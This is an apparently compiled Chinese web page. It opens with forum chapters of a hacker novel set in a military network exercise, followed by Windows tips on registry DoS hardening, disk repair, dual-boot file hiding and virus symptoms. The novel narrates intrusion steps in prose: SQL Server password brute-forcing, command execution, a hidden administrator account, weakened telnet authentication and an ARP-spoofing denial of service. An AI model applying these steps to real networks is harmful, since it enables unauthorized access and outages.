    看过一部连续剧叫《一网情深》是陆帅哥的主演，至于里面人家网线都没有插，就靠一个email地址，就输入密码登陆，然后3次就成功获得密码，然后发现不能连接，最后结论是别人没有开机！这些就不说了。就是论气质，陆帅哥也不像是个计算机工作者。真的不像，那种气质装不出来的。
    老张现在非常悠闲，不过即使他休闲的时候，仍然让我们觉得他在认真的做事情。
    他在继续研究红帽子9.0的系统漏洞。
    现在我们篮军在演习中取得了绝对的优势，因为我们获得的情报，基本红军就处于挨打地位。这是刘队说的。他脸上笑容很灿烂。
    我还在继续扫描对方的服务器。同时我重点的监控我方的服务器。我可不想要我们的服务器被对方渗入。一切正常，任何东西，不可能出现奇迹。奇迹一般出现在影视作品中。生活就是生活，我们的服务器只是开了80，其他我们基于包过滤检查ip，有人24小时值守，对方没有突破的可能。
    我估计红军这两天的日子不好过，他们肯定在拼命的检查他们的情报如何泄漏出去的。我相信，他们对抗分队这几天可能在拼命检查，我们是否渗入。
    呵呵，别忙了，相信自己吧，我们不是神仙，我们没有渗入你们的服务器。正如你们无法渗入我们的服务器一样。
    我们只是搭上了你们下属指挥部的便车而已。
    我想他们知道我们不知道那些ip，所以思维根本就没有往这个方向想。一旦思维发生偏差，即使我们看来简单的东西，我想也能让他们感到不可思义。
     时间就这样过去，离开演习结束的时间剩下了两天了！
    我们小组的人都感到高兴，终于可以离开这个屋子里面，这么多天，我们跟关禁闭差不多，幸好我们有电脑。对我们这些电脑fans来说，有电脑有网络就足够了。
      刘队又开了个会。这次开会比上次气氛自然不同。因为我们完全是胜利在握了。
     气氛很轻松，刘队布置了最后两天的部署。
    最后的任务是让对方拒绝服务！因为，演习基本结束了。他们的情报基本没什么用了，为了证明我们对抗分队的实力，我们让对方的服务器不能正常工作来结束我们的演习，同时也是展示我们的实力，让上级知道我们的成果！
    对于是否攻击我们渗入的下属指挥部的问题，刘队犹豫了一下。
    最后决定不对我们渗入的计算机进行攻击。而且还要在最后的时候彻底清除我们留下的后门。尽量不要留下任何痕迹。
    我想刘队长可能是想保留一点秘密，作为下次对抗的法宝。
    网络这个东西，其实并不复杂，但是如果你把谜底告诉别人，下次你就没什么窍门了。到时候可能一点办法也没有！
    凭心而论，如果他们的下属指挥部的稍稍加强监视，我们确实没有办法获得对方的情报，更不可能渗入对方的计算机。基本上，大家都没有办法。
    黑客就是这样，在你攻入之前，谁也不敢保证一定能成功。“苍蝇不盯无缝的蛋"用来形容黑客和网站的关系，真是太贴切了。尽管真正的黑客不是苍蝇。呵呵。
    我现在在考虑如何直接给对方的服务器发起拒绝服务攻击。如果通过我们攻克的机器坐跳板，不要说拒绝服务，就是渗入都有可能。但是这样的势必会给对方留下痕迹，对方不是傻子，他们肯定会发现来自他们自己ip的攻击记录，这样不是暴露了我们的手段吗？刘队要我们不要暴露，显然这样是行不通的。
    我们现在即使使用老张发现的红帽子9的内核溢出漏洞，和我发现的apache的溢出漏洞。我们也无法直接实现攻击。因为对方已经搞了包过滤，很可能安装的是的一个防火墙。
    因为对方对我们的ip包直接进行了过滤。更本就不响应我们的数据，所以溢出当然也无从谈起。
    呵呵，没关系。要拒绝服务我的办法多的是。
    首先，我使用tracert命令查看到了我们的目标对方服务器所在的路由器的地址。由于我们都是一个区域的，所以，经过的节点不是很多。
    直接攻击路由器，只要他的路由器不工作了。呵呵他的服务器和外面也就断了。虽然没有拒绝服务，但是对其他人来说，效果也是一样。只是，那个路由器转发的所有机器都不能上网，打击面太光，是下策。不到万不得以，我不想使用这招。
    在我们国内的网络中，很多人不知道，其实路由器是个安全的大隐患。由于现在的那些喜欢搞破坏的“假黑客”们大部分网络知识并不深厚，还有他们一般的人都无法接触到路由器，所以，对路由器的了解几乎等于0，当然更谈不到攻击。网上的攻击教程能用的几乎都是windows下的攻击，所以你可以理解原因了。因为windows在我们国家到处都是，从这一点来说，说windows不安全，好像也不太公平，树大招风的道理，我想大家应该都懂。　路由器里面其实也有固化的一个操作系统，也是一个软件，他的设计水平，说句实话，比起windows来说，都要简陋的多。他的设计人员的水平，比起其他操作系统的设计人员来说，差距也是非常明显的。
    由于他功能单一，不考虑兼容性和易用性等，核心固化，一般管理员不允许远程登陆，加上了解路由器的人少的很，所以他的安全问题还没有什么表现出来。有时候偶尔出现死机状态，管理员一般reboot他后，也就ok了。
    也正因为这样，即使很多路由器的管理员除了熟悉那些命令外，其实也搞不清楚他的工作原理。因为路由器通常都是厂家负责维护的。
    连unix都漏洞不少，何况路由器的操作系统？所以路由器的漏洞其实真的不少。当然路由器一般是无法渗入的。因为，你无法远程登陆，一般管理员都不会开的。但是让路由器拒绝服务的漏洞真是不少。而且，我们国内的管理员有个毛病，他们往往对操作系统的补丁比较有意识来补，但是对路由器的OS的补丁，很多管理员更本都没有管。
    所以，对这样的路由器让他拒绝服务真的可能性非常大。
    而且一般你攻击过后，管理员一般会认为是的一般性死机，大部分都是reboot了事。根本不会去找原因，更不会怀疑是有人攻击。
    我曾经用过一个某通公司的网络，他们的路由器经常死掉。后来我发现他们的路由器有拒绝服务漏洞，很可能有人攻击造成的。但是每次客户打电话，他们的管理员都是认为可能不稳定造成的。到现在，那个网络还经常断调，每次都是他们的管理员reboot路由器解决问题。
    不过使用路由器攻击，不一定能成功，而且不是最佳方式，所以我好要继续想办法！
    也许是的受到刚才思维的影响，我开始扫我们对手的服务器所在子网的其他ip，我希望自己能在那个服务器所在的其他子网找到一个机器，攻击他，然后让自己和服务器成为一个子网，这样攻击的可能性将大很多，比如arp欺骗攻击对基于交换的网络效果非常明显，现在几乎还没什么好的解决方法。呵呵。
    打定注意，我开始扫描，呵呵，这个子网明显可能是的军队的机器，防护都比较严格。基本没有扫到非常简单的漏洞。不过大部分都是2000机器，而且开的端口不少，这个给我了希望。呵呵。
    135和139端口几乎每个机器都开了的，但是这两个端口，搞拒绝服务还可以，想渗入就不行了。
    必须要另外找其他途径。
     终于我在一台机器上找到一个1433端口，呵呵，如果没有猜错的话，应该是ms sql server。哈哈，这个东西有执行本地命令漏洞。
    呵呵，如果密码被我破译的话，他就死定了。。。。。。
    后记：我看了看今天自己写的东西，越来越觉得不像小说了。完全是一篇黑客教程。哎，我真的非常遗憾。由于考虑到网友们提出的很多观点，我现在几乎就是在讲技术问题了。
    这不是我想要的。以后技术的东西我要渐渐淡化，我的目的是让稍有计算机知识的人能看懂这篇小说，能喜欢这篇小说。

--------------------------------------------------------------------------------
作者: SimpleLove　　时间: 2004-3-19 23:16　　 标题: [转帖]我是一个黑客 [经典长篇小说]

OK，完了，大家可以慢慢的看。仔细的体会一下书里所描写的内容。
这篇文章我看了不下5遍了，说实话感觉很好。有一定的技术含量，更主要的是有一种思想。
--------------------------------------------------------------------------------
作者: oftenboar　　时间: 2004-3-20 11:36　　 标题: [转帖]我是一个黑客 [经典长篇小说]

写的好啊,为什么没有写完呢?
期待!!!!
--------------------------------------------------------------------------------
作者: jhck　　时间: 2004-3-20 14:32　　 标题: [转帖]我是一个黑客 [经典长篇小说]

我也是,希望马上能看到后面的内容,确实精采!!!
--------------------------------------------------------------------------------
作者: shiqilili　　时间: 2004-3-20 17:17　　 标题: [转帖]我是一个黑客 [经典长篇小说]

期待

--------------------------------------------------------------------------------
作者: laputa　　时间: 2004-3-20 17:31　　 标题: [转帖]我是一个黑客 [经典长篇小说]

当我看到那个1433端口的时候，我心中有点信心了。
    说句实话，现在的系统和服务器软件越来越成熟，漏洞越来越少，特别是WWW服务器，可以说如果用一个好的软件，安全性是非常好的。我相信有一天，黑客会越来越少。
    虽然不至于灭亡，但是也像凶猛的老虎一样，会越来越少，因为在大部分计算机工作者的努力下，软件会越来越成熟，黑客的空间会越来越小。
    尽管，软件界有不存在绝对正确的程序的观点，但是我还是承认，现在可以利用的空间真是越来越少了。
    但是随着数据库系统在网络中的运用，数据库的攻击逐渐成为黑客人攻击的新目标。
    说句实话，我现在也无法理解网上居然这么多人用MS的服务器软件？
    如果说做桌面，我始终认为ms是NO.1。尽管，MAC很优秀，但是从通用这个角度，还是MS更厉害。市场的选择绝对不是乱来的。
    但是如果说做服务器，选择的东西太多，无论怎么说，MS都是 NO.eleven.呵呵，排名最后的。
    说操作系统，便宜甚至免费，稳定，漏洞少的like unix系统多了去了。
    论服务器软件，世界一些爱好者自己的apache project，涌现了如此多的好的东西。还免费，为什么不用？
    论数据库软件，有钱你就用oracle，没钱就用postgresql，小型就用mysql。比什么不好，为什么用ms sql ？
    MS sql的功能强大，简单易用。但是，这种强大，隐藏了太多的漏洞。而且是执行本地命令的漏洞，这个漏洞对一个系统来说是致命的！
    很少大型的商用数据库用ms sql的。
    对oracle我是服气的，我对许多oracle数据库进行过测试，但是我失败了。

    一个网络管理员的知识必须是全面的。很多情况就是搞数据库的不懂网络安全，懂网络安全又不懂数据库。所以，漏洞就出现了。
    ms sql就是加了补丁也是一样的没用。呵呵，我测试过，稍稍改一些程序，照样攻入！

    “小王，过来看”老张喊我。
    我过去一看，呵呵，老张和我刚才攻击成功了98，思维都是和我一样的。他也在扫那个网段的机器。
    他也居然找到我盯着的那太有mssql的机器。
    “我也在盯这台机器”我淡淡的说。老张调试程序的时候像个孩子，嘴里还在哼歌曲。不过，基本左的让我没听出来是什么曲子。
    “这个家伙这个端口打开着，我们破译他的密码看看如何？我觉得他的密码不可能很长。“。老张说。
    “这个办法笨是笨，如果对方没有加安全策略的话，成功的可能性比较大”。
    “一台机器可能不行，我们多搞几台机器同时来，如何？”呵呵，反正这是公家的机器，不用白不用。呵呵。
    “怎么，你想搞个集群？”老张笑着看我。
    “呵呵，我们来试一下，死马当活马医。”我蛮有兴致的。
    “好，反正没事情”老张也有兴趣。
    搞计算，linux系统比windows好的多。我们把我们的笔记本都安装了一个最简单的linux。这样，我们就有3台机器，加上那台服务器。
    然后在网上去找了个mosix，这个搞分布运算不错，他可以进程迁移。
    让我们把一切搞停当的时候，都晚上12点了。
    开了我们的多线程sql 密码测试程序，然后就睡觉去了。我们一共开了上千个线程，基本三台机器都在满负荷运装了。
    没有想到，没有想到，一大早被老张喊醒。
    我懵懵懂懂睁开眼睛：”怎么拉？“
    老张的脸都笑烂了，呵呵，我看到一张灿烂的脸在我眼前晃，真不敢相信是老张的脸。呵呵。
    “密码出来了，密码出来了”。
    “不会这么快吧，呵呵，你骗我”
    “真的，真的，出来了，你猜密码是什么？”老张继续笑。
    没看到老张这么开心的。
    我赶紧冲到机器上看，果然我们的集群软件里面进程数已经恢复正常。也就是没有额外的进程负荷了。
    显然密码测试已经结束，结束的条件当然是的探测到了正确的密码。
    我熟练的敲出查密码的命令，密码居然是的123321！我晕，难怪老张笑的这么欢。
    “我靠！”来了句，然后也笑起来！
    这个机器的主人看来不知道他这个密码多么的危险。
    大家不要笑，如果不是网上很多教程千叮嘱，万叮嘱，很多人密码都不会设！这位还知道设置个密码。
    可惜他这个密码太过简单。
    “可惜我的集群”我心里居然没有获得密码的喜悦，这是奇怪。难道真是太容易获得的东西，就觉得不珍贵？
    管他的，目的达到了就行了。
    下面的工作就简单了。

    使用这个sa帐号登陆对方的sql serve，然后执行本地命令。
    算了，上传程序太麻烦了。
    我干脆就开了对方的telnet。然后给自己建了个隐蔽的帐号，加入administrators组。
    把telnet的NTLM认证方式改为0。ok，一切顺利。
    连接上去之后，执行本地命令容易多了。看了看，上面的文件，凌乱不堪。没看到有用的资料。没关系，只要能进入我们目标的子网。我们攻击成功的可能性就要好多了。
    退出来，我和老张商量如何进行攻击。演习就要结束了。
    “看来渗入对方服务器是的没门了”老张在我们攻克的机器上用sniffer监视了好久。
    “呵呵，对呀，对方的服务器防的太死，他们基本就有没有和外界主动通讯”。
    “搞拒绝服务，怎么样？你准备用什么方法？”
    “要么用arp，要么直接攻击路由器。”我说。
    “呵呵，够狠的。”老张看来也想到了。

    “刘队，可以开始攻击了吗？”老张大喊。
    大家都围过来来了。
    “当然可以了，演习今天就结束了。你找到了方法了吗？”
    老张把我们想法给大家说了一下，大家都没意见。
    刘队也眼睛放光。
    “好，就这样，开始”刘队和大家都围着我。
    我立刻在我们攻克的那太计算机上启动了arp欺骗攻击程序。一会儿，对方的服务器就出现了脱网的现象。
    这个方法在局域网里面非常有效果。对于集线器的网络，成功率几乎是100％。对于交换机环境，管理员如果设置不当的话，照样有效果。
    其实原理很简单，因为局域网里面任何协议的通讯其实都是基于网卡物理地址的。只需要在服务器确认ip和物理地址的对应关系的时候，发出一些干扰和错误信息，让服务器或者交换机判断失误，效果就达到了。
    我想在设计当初通讯的时候，设计人员做梦都没有想到这个可以拿来搞破坏！
    其实网络满脆弱的。现在的人对网络研究的越来越深，很多设计都没考虑到的问题现在都暴露出来了。有时候还真的会出现很难解决的尴尬的局面。
    其他哥们不停的测试着对方的服务器，一直都是time out。无法连接上了。对方的服务器出现了假脱网的现象。
    这种脱网他们从自己的服务器上是无法找到原因的。
    呵呵，他们死定了。
    他们哪里想的到其实我们的攻击计算机和他们服务器在一个子网？

    没什么戏剧性变换，换了我们，我们一样没有办法。他们唯一的失误就是让我们获得了他们几个ip。我想他们也不是傻子，他们肯定也是对我们的子网进行过扫描，大家都用的是的民用网络。也许我们运气比较好，还是我们这个子网的其他用户没有开机还是防护的比较好，反正对方没有渗入我们的子网。他们渗入的话也可以搞arp攻击。但是直到最后，我们的服务器仍然通讯正常。
    显然，他们没有渗入我们的子网。否则，我们面对arp攻击，一样很难在短时间有好的对策。
    最后的胜利属于我们，蓝军。
    本来想对那个路由器进行攻击的，但是想想回牵连到很多无辜的人，我最后放弃了。
    平生最讨厌的事情之一就是正在上网的时候，网络突然断掉。我想别人也不会喜欢这样的。

    刘队从通讯室出来的时候，脸上洋溢着笑。对我老张的眼神充满了赞赏。
    晚上开拔回军区的时候，气氛完全不一样。
    还是那辆迷彩EVICO，但是窗户大开。警通连的士兵们也没有严正以待。还给我们开开玩笑。我们几个“民兵”从开始的拘束到现在已经获得很熟了。用他们的话说，已经有了“革命的友谊”。尤其是我和老张。简直成了铁哥们。
    开始还觉得老张瞒内向的。但是遇到同行，老张绝对可以用外向来形容。
    老张笑起来声音很大，而且没有顾忌。我第一次觉得，老张很有“童心”的。
    我不知道为什么想起这个词，但是老张给我的感觉就是这样。心无城府，技术是他生命中的全部。
    我喜欢这样的人，现在这样的人不多了。到处看到都是溜须拍马，不学无术的嘴脸。像老张这样的人，也许不得社会喜欢，但是我真的敬佩这样的人，尽管我做不到他这样。
    我真的敬佩老张这样的人，这是真心话。

    军区院子里面到处都是披挂整齐的士兵和军车。但是我们明显感到空气中洋溢的喜悦的气氛。
    和刚刚出来的时候，那种紧张的气氛完全不一样，尽管车还是那些车，人还是那些人，地方还是那个地方。但是和我们离开的时候，恍若隔世。
    演习取得大的胜利，能不高兴吗？

    有谁知道，这里面有我们信息对抗分队的一部分功劳？
    我心里暗暗的想，看着士兵纯真的笑脸，我心里涌起一种自豪。

    庆功宴是少不了的。
    军区食堂的菜在大锅菜里面绝对算极品了。反正我觉得比上大学的时候食堂的东西要好吃百倍，也许是心情太好？
    那些场面上的话，我觉得无聊。从头到尾，我脸上都堆着傻笑，引来一批一批敬酒的人。但是我一律可乐伺候。
    刘队看来酒量也不高，但是没有办法，他的目标太大，我们离开的时候，刘队基本就是默默无语阶段了。

    晚上房间里面，我和老张都没有说话，我们打开那台跟随我们20多天的军用笔记本慢慢的用着，轻柔的就像抚摸它的脸。
    我找到一首歌曲，是首英文歌曲，听的我想掉泪。
    名字叫sailing。
    i am sailing,i am sailing home again cross the sea,i am sailing stormy water,to be with you,to be free.
    i am flying,i am flying like a bird across the sky,to be with you,to be free....................
    ....................
    我听到了什么，我听到了一种悲壮的勇气，一种不屈的精神，这也是黑客的精神。

    那天晚上，不知道什么时候睡着的。梦中我看到自己在海上航行。。。


修改注册表提高Win2000抗拒绝服务攻击能力

《一键清理系统垃圾》

修改注册表提高Win2000抗拒绝服务攻击能力

从正确看待DoS与DDoS说起

相信大家都一定不会对这两个这个词感到陌生，是的，拒绝服务攻击（Denial of Service），以及分布式

拒绝服务攻击(Distributed Denial of Service）。

所谓拒绝服务，是指在特定攻击发生后， 被攻击的对象不能及时提供应有的服务，例如本来应提供

网站服务（HTTP Service）而不能提供网站服务，电子邮件服务器(SMTP，POP3)不能提供收发信件等等

的功能，基本上，阻绝服务攻击通常利用大量的网络数据包，以瘫痪对方之网络及主机，使得正常的使用者

无法获得主机及时的服务。

分布式拒绝服务，简单的说就是用远超过目标处理能力的海量数据包消耗可用系统，以及网络带宽，造成网络

服务瘫痪。

也许是和媒体的过分关注有关，DoS攻击特别是DDoS攻击，似乎一夜之间就流行了起来，搞的大大小小的网管们，

只要服务器一有故障，就异常兴奋的高呼“我被DDoS了！”，脸上仿佛写着无比的光荣和骄傲。

其实在我们的周围，真正意义上的DDoS其实并不多，毕竟发动一次DDoS攻击所需要的资源非常的多，但实实在在

的攻击却又不停的发生着，这里面，绝大多数，都是普通的拒绝服务攻击。普通级别的攻击，如何

防护，也成为很多网络管理员最头疼的问题，于是到处打听，结果往往千篇一律，“购买我们的

硬件防火墙吧”。硬件防火墙，包括专用抗拒绝服务攻击产品的确是好，但基本价格都十分昂贵，效果虽然好，

可从投资以及保护投资的角度来说，未免有些过火。

其实从操作系统角度来说，本身就藏有很多的功能，只是很多是需要我们慢慢的去挖掘的。这里我给大家简单

介绍一下如何在Win2000环境下修改注册表，增强系统的抗DoS能力。

细节：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]

'关闭无效网关的检查。当服务器设置了多个网关，这样在网络不通畅的时候系统会尝试连接
'第二个网关，通过关闭它可以优化网络。
"EnableDeadGWDetect"=dword:00000000

'禁止响应ICMP重定向报文。此类报文有可能用以攻击，所以系统应该拒绝接受ICMP重定向报文。
"EnableICMPRedirects"=dword:00000000

'不允许释放NETBIOS名。当攻击者发出查询服务器NETBIOS名的请求时，可以使服务器禁止响应。
'注意系统必须安装SP2以上
"NoNameReleaseOnDemand"=dword:00000001

'发送验证保持活动数据包。该选项决定TCP间隔多少时间来确定当前连接还处于连接状态，
'不设该值，则系统每隔2小时对TCP是否有闲置连接进行检查，这里设置时间为5分钟。
"KeepAliveTime"=dword:000493e0

'禁止进行最大包长度路径检测。该项值为1时，将自动检测出可以传输的数据包的大小，
'可以用来提高传输效率，如出现故障或安全起见，设项值为0，表示使用固定MTU值576bytes。
"EnablePMTUDiscovery"=dword:00000000

'启动syn攻击保护。缺省项值为0，表示不开启攻击保护，项值为1和2表示启动syn攻击保护，设成2之后
'安全级别更高，对何种状况下认为是攻击，则需要根据下面的TcpMaxHalfOpen和TcpMaxHalfOpenRetried值
'设定的条件来触发启动了。这里需要注意的是，NT4.0必须设为1，设为2后在某种特殊数据包下会导致系统重启。
"SynAttackProtect"=dword:00000002

'同时允许打开的半连接数量。所谓半连接，表示未完整建立的TCP会话，用netstat命令可以看到呈SYN_RCVD状态
'的就是。这里使用微软建议值，服务器设为100，高级服务器设为500。建议可以设稍微小一点。
"TcpMaxHalfOpen"=dword:00000064

'判断是否存在攻击的触发点。这里使用微软建议值，服务器为80，高级服务器为400。
"TcpMaxHalfOpenRetried"=dword:00000050

'设置等待SYN-ACK时间。缺省项值为3，缺省这一过程消耗时间45秒。项值为2，消耗时间为21秒。
'项值为1，消耗时间为9秒。最低可以设为0，表示不等待，消耗时间为3秒。这个值可以根据遭受攻击规模修改。
'微软站点安全推荐为2。
"TcpMaxConnectResponseRetransmissions"=dword:00000001

'设置TCP重传单个数据段的次数。缺省项值为5，缺省这一过程消耗时间240秒。微软站点安全推荐为3。
"TcpMaxDataRetransmissions"=dword:00000003

'设置syn攻击保护的临界点。当可用的backlog变为0时，此参数用于控制syn攻击保护的开启，微软站点安全推荐为5。
"TCPMaxPortsExhausted"=dword:00000005

'禁止IP源路由。缺省项值为1，表示不转发源路由包，项值设为0，表示全部转发，设置为2，表示丢弃所有接受的
'源路由包，微软站点安全推荐为2。
"DisableIPSourceRouting"=dword:0000002

'限制处于TIME_WAIT状态的最长时间。缺省为240秒，最低为30秒，最高为300秒。建议设为30秒。
"TcpTimedWaitDelay"=dword:0000001e

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
'增大NetBT的连接块增加幅度。缺省为3，范围1-20，数值越大在连接越多时提升性能。每个连接块消耗87个字节。
"BacklogIncrement"=dword:00000003

'最大NetBT的连接快的数目。范围1-40000，这里设置为1000，数值越大在连接越多时允许更多连接。
"MaxConnBackLog"=dword:000003e8

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Afd\Parameters]
'配置激活动态Backlog。对于网络繁忙或者易遭受SYN攻击的系统，建议设置为1，表示允许动态Backlog。
"EnableDynamicBacklog"=dword:00000001

'配置最小动态Backlog。默认项值为0，表示动态Backlog分配的自由连接的最小数目。当自由连接数目
'低于此数目时，将自动的分配自由连接。默认值为0，对于网络繁忙或者易遭受SYN攻击的系统，建议设置为20。
"MinimumDynamicBacklog"=dword:00000014

'最大动态Backlog。表示定义最大"准"连接的数目，主要看内存大小，理论每32M内存最大可以
'增加5000个，这里设为20000。
"MaximumDynamicBacklog"=dword:00002e20

'每次增加的自由连接数据。默认项值为5，表示定义每次增加的自由连接数目。对于网络繁忙或者易遭受SYN攻击
'的系统，建议设置为10。
"DynamicBacklogGrowthDelta"=dword:0000000a

以下部分需要根据实际情况手动修改

'-------------------------------------------------------------------------------------------------
'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
'启用网卡上的安全过滤
'"EnableSecurityFilters"=dword:00000001
'
'同时打开的TCP连接数，这里可以根据情况进行控制。
'"TcpNumConnections"=
'
'该参数控制 TCP 报头表的大小限制。在有大量 RAM 的机器上，增加该设置可以提高 SYN 攻击期间的响应性能。
'"TcpMaxSendFree"=
'
'[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{自己的网卡接口}]
'禁止路由发现功能。ICMP路由通告报文可以被用来增加路由表纪录，可以导致攻击，所以禁止路由发现。
"PerformRouterDiscovery "=dword:00000000
'-------------------------------------------------------------------------------------------------

写到这里，我自己都有一点晕乎乎的了。呵呵。

从提高系统安全级别对抗DoS的角度来说，上面所做的修改注册表还仅仅是其中一个很小的部分。


用金山毒霸修复硬盘一例

《一键清理系统垃圾》

用金山毒霸修复硬盘一例

     前些日子朋友拿来一硬盘，说是中了CIH 病毒，试了许多办法都无法修复，因为只要一接上这个硬盘，不管是做成主盘或是做成从盘,系统都没法启动，更为奇怪的是用软盘启动计算机，他照样死机。平时准备的win98启动盘、杀毒盘统统不管用了，急煞我也！对了，我还有一招：低格！进入cmos ，还好，还能检测出来，毫不犹豫地选择低格，OK ，正常结束。我迫不及待地重新启动，嗯？怎么还是死机！难道这个硬盘就没救了？不行，我得首先解决机器启动问题。我从箱底里找出多年没有使用过的dos3.31软盘,插入软驱，按下电源开关，哇！起来了，心里一阵狂喜，有戏。赶快拿出我刚从网上下载下来的金山毒霸(试用版)，做成一张应急盘，运行kavfix:

    1、 Display Hard Disk Partition Table,显示结果，分区表里的内容面目全非。
    2、 Destory Hard Disk MBR,清除硬盘主引导记录。
    3、 Normal Fix Hard Disk, 修复硬盘。
    4、 Quit 退出
    取出dos3.31软盘，插入win98启动盘，重新启动，一切OK！剩下的活儿便是轻车熟路的分区、格式化。

    至此，该硬盘完全修复，金山毒霸和dos3.31还真管用。


用双系统进行简单加密

《一键清理系统垃圾》

用双系统进行简单加密

《中国电脑教育报》孙光

    在实际工作生活中，好多人在电脑里都有自己的秘密，许多人都试着使用过加密软件。而今天我想说一种仅采用双系统就能简单加密的方法。

    相信很多人还没采用过Windows 98+Windows 2000这样的双系统，那就在Windows 98的基础上在另一个分区再装一个Windows 2000吧。在安装Windows 2000的过程中，是不是会询问我们是否要把安装Windows 2000的分区格式化成为NTFS格式，这时有人会说我硬盘里还有好多宝贵的东西啊。不要紧！那就选择不改变当前分区保存原有文件，等装好Windows 2000后再转换吧。方法是在Windows 2000下点击“开始→运行”在运行对话框中键入“Convert X:/FS:NTFS”（其中X是你想要转换的分区）。这可是无损转化，你的东西不会丢失的，这下放心了吧。

    然后右击“我的电脑→属性→高级→启动和故障分析”，修改一下启动的顺序菜单，选中“Microsoft Windows 98”，在显示操作系统列表中将停留时间改成0秒并确定，再重新启动系统。怎么样，是不是和原来只装有Windows 98时一样，既没有双系统选择菜单，也没有任何停顿。进入Windows 98打开“我的电脑”看看，并没有Windows 2000的盘符。再进入Windows 2000看看，是不是全都能看得见啊。现在有什么想要隐藏的东西那就从别的盘里剪切过来吧。此时，在Windows 98下看不见也动不了Windows 2000 分区NTFS格式下的东东，而Windows 2000却能完全访问Windows 98里的数据。是不是很爽！

    这时你该问了：“电脑进入Windows 98时那么痛快，可又没有启动选择菜单，我怎么进Windows 2000啊？”别急！启动时按住F8键启动菜单，再看看，是不是又出现了启动选择菜单？选择Windows 2000就行了。

    有高手说了：“我在Windows 98下用软件也能看见Windows 2000里的东西。”是，我不否认，可我说的是“简单加密”！如果你还没试过我说的方法，那就试试吧，可千万别告诉我你还不会安装Windows 2000啊！呵呵。


正确区分计算机病毒与软硬件故障

《一键清理系统垃圾》

正确区分计算机病毒与软硬件故障

    近几年以来，随着计算机反病毒技术的发展，广大用户对病毒的态度从“谈毒色变”慢慢变成了“见怪不怪”，不过在经历了CIH病毒的大规模爆发之后，许多用户又开始有些“神经过敏”了，动不动就怀疑自己“中毒”，有的甚至经常格式化硬盘，这样不仅不能解决问题，而且还会影响硬盘的寿命。其实在各种计算机故障中，病毒只占其中的一小部分，很多类似病毒的现象都是由计算机硬件或软件故障引起的；另一方面，同时有些病毒发作时的现象又与硬件或软件的故障现象类似（如引导型病毒等），这给用户的正确判断造成了很大的影响。在这种情况下，我们该如何正确区分计算机病毒与系统软硬件故障呢？本人特意对计算机病毒及相关软硬件故障进行了一番对比，找到一些区分病毒与系统软故障的方法，现介绍给大家：
一、常见的病毒表现
1. 屏幕上出现一些不是由正在运行的应用程序显示的异常画面，如字符跳动、屏幕混乱、无缘无故地出现一些询问对话框等；
2. 当用户没有对软驱进行操作时系统自动读写；
3. 在排除磁盘故障的情况下出现用户数据丢失；
4. 磁盘文件的属性、长度发生变化；
5. 系统的基本内存无故减少；
6. 磁盘出现莫名其妙的坏块，或磁盘卷标发生变化；
7. 系统在运行过程中莫名其妙地死机、系统自动启动等故障；
8. 计算机从事同一磁盘操作（如拷贝文件、存储文件等）的时间明显增加；
9. 应用程序的启动速度明显下降。注意，这里所说的启动速度并不是指Windows 98的启动速度，而是指启动普通应用程序的速度。
一般来说，系统在出现前面5种现象之后几乎可以肯定就是感染了病毒，我们应使用干净的DOS或Windows 98启动盘启动计算机，然后再对病毒进行清除；系统若出现后面4种现象，则有可能是感染了病毒，也有可能是系统其它故障所造成的，不过大家最好还是不要掉以轻心，使用最新版的杀毒软件对系统进行扫描还是很有必要的。
二、与病毒现象类似的硬件故障
1. 系统硬件配置不兼容：这种故障常在兼容机上发生。由于配件的不完全兼容，导致一些软件不能够正常运行，广大用户应将其与病毒区分开来，在自己组装计算机时应首先考虑配件的兼容性。
2. 电压不稳定：电压不稳对计算机运行有较大影响，如出现磁盘读写故障或文件丢失等，严重的时候甚至导致系统自启。建议电压不稳定的用户加装稳压器或不间断电源（UPS）。
3. 接触不良：接触不良所导致的故障有时会是你想象不到的，如显示器电缆与显卡接触不良时可能会使显示器显示不稳定；磁盘信号线与主板接触不良会导致磁盘读写时好时坏；软驱安装位置不对会导致软盘读写失效；打印机电缆与主机接触不良时会造成打印机不工作或工作现象不正常等等。
4. 硬件超频：超频可使电脑总体性能得到提升。不过超频在一定程度上确实会引发许多系统故障，如超频之后CPU散热不好经常会出现运行应用程序出错、死机等故障；若内存的速度达不到也会碰到类似问题；并且超外频之后经常会引发硬盘、软驱、光驱等外设运行不正常，从而导致文件读写失败；超频显卡也容易造成花屏、死机、黑屏等故障。这些都与病毒有些类似，因此广大用户如果对系统进行了超频，那么碰到上述故障之后应考虑恢复系统原始状态。
5. 磁盘故障：硬盘保存着计算机运行所需的全部数据，如果硬盘存在逻辑或物理上的问题，那么系统运行不可能正常。本人上一个硬盘“光荣”之前，系统就因为磁盘读写不畅而多次出现不能启动、运行过程中死机、无法安装Windows 98等故障，经常对磁盘进行扫描、碎片整理是排除此种故障的最佳手段。用户如果使用质量低劣或损坏、发霉软盘，则会把软驱磁头弄脏，出现无法读写磁盘或读写出错等故障。遇到这种情况之后，我们只需用清洗盘清洗磁头一般即可排除故障。
6. CMOS问题：CMOS设置对系统的效率有着非常重大的影响，如果用户的CMOS设置不当，那么系统很可能会出现一些莫名其妙的故障，如用户在主板的病毒检测功能开启的情况下直接安装Windows 98，则主板的病毒检测功能就会禁止安装程序修改硬盘引导信息，从而导致安装失败；CMOS的Cache设置也是非常关键的，用户若将Cache关闭，则系统运行速度会大大降低；还有，用户如果在CMOS中设置了不正确的硬盘参数，硬盘运行状态多半会出现异常，读写错误、文件丢失也就在所难免了。因此广大用户应设置正确的CMOS信息，尽可能地防止它们影响系统运行。
三、与病毒现象类似的软件故障
1. BUG：现在许多应用程序的设计都不太完善，经常出现这样或那样的BUG，它们都有可能引发一些莫名其妙的系统故障，广大用户应尽量避免使用那些设计不完善的应用程序。
2. 自动运行的程序过多：在DOS时代，系统启动速度降低意味着有可能感染了病毒，而在Win 98，这就是各种自动运行软件的“功劳”。大家都知道，目前许多软件在安装时都喜欢自作主张将自己添加到系统的启动程序组，这样系统启动时就会自动运行，这虽然对用户的操作带来某些便利，但启动时间过长却是绝对避免不了的了。另外，启动Windows 98时若运行了太多软件，系统资源就会下降，系统性能会变得相应不稳定。
